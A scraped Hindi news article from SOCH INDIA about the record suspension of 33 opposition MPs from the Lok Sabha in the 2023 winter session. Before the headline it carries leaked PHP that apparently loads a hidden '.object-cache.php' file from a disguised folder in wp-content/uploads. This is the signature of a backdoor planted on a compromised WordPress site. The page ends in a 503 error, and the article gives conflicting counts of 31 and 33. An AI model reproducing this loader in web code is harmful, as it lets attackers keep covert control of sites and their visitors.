add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Parliament Winter Session 2023: लोकसभा में रिकॉर्डतोड़ निलंबन, हंगामे पर 33 सांसद सस्पेंड, कांग्रेस बोली- तानाशाही चरम पर – SOCH INDIA
Menu

देश
Parliament Winter Session 2023: लोकसभा में रिकॉर्डतोड़ निलंबन, हंगामे पर 33 सांसद सस्पेंड, कांग्रेस बोली- तानाशाही चरम पर

nobanner

सदन में हंगामा करने के आरोप में सोमवार को लोकसभा में सदस्यों का रिकॉर्डतोड़ निलंबन किया गया. स्पीकर ओम बिरला ने विपक्ष के 31 सांसदों को पूरे सत्र के लिए सस्पेंड कर दिया है. सस्पेंड होने वालों में कांग्रेस संसदीय दल के नेता अधीर रंजन चौधरी और डीएमके नेता टीआर बालू भी शामिल हैं. कांग्रेस ने स्पीकर की इस कार्रवाई को तानाशाही करार दिया है.

पिछले हफ्ते 13 सांसद हुए थे निलंबित

बताते चलें कि संसद की सुरक्षा मामले में हंगामा करने पर स्पीकर शुक्रवार को लोकसभा के 13 सांसद इस पूरे सत्र के लिए निलंबित किए थे. इस मुद्दे पर विपक्ष के सांसदों ने सोमवार को लोकसभा में जमकर हंगामा किया. वे निलंबित हुए सांसदों का पनिशमेंट खत्म करने और गृह मंत्री अमित शाह के लोकसभा में बयान की मांग कर रहे थे. स्पीकर ओम बिरला ने उनसे कई बार शांति बनाए रखने का आग्रह किया लेकिन सदन में हंगामा होता रहा.

सोमवार को 33 सांसद और हुए सस्पेंड

इसके बाद संसदीय कार्य मंत्री प्रहलाद जोशी ने हंगामा कर रहे सभी सांसदों को पूरे शीत सत्र के लिए सदन से सस्पेंड करने की मांग की. इस अपील पर स्पीकर ओम बिरला ने अधीर रंजन चौधरी और T R बालू समेत विपक्ष के 33 सांसदों को लोकसभा से सस्पेंड कर दिया. इस नए पनिशमेंट के साथ ही लोकसभा से सस्पेंड हुए सांसदों की संख्या बढ़कर अब 46 हो गई है. जबकि हंगामे के आरोप में राज्यसभा का एक विपक्षी सांसद भी सस्पेंड चल रहा है.

‘सरकार की तानाशाही चरम पर’

सांसदों के मास निलंबन पर कांग्रेस ने कड़ी प्रतिक्रिया जताई है. सदन से निलंबित हुए कांग्रेस संसदीय दल के नेता अधीर रंजन चौधरी ने कहा कि सरकार की तानाशाही चरम पर है. विपक्षी सांसदों ने गृह मंत्री अमित शाह के सदन में बयान देने और निलंबित सांसदों की बहाली की मांग की थी. केवल इतनी सी बात पर मास लेवल पर विपक्षी सांसदों का सस्पेंशन कर दिया. लेकिन इस तानाशाही के बावजूद चीजें बीजेपी के मुताबिक नहीं चलेंगी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.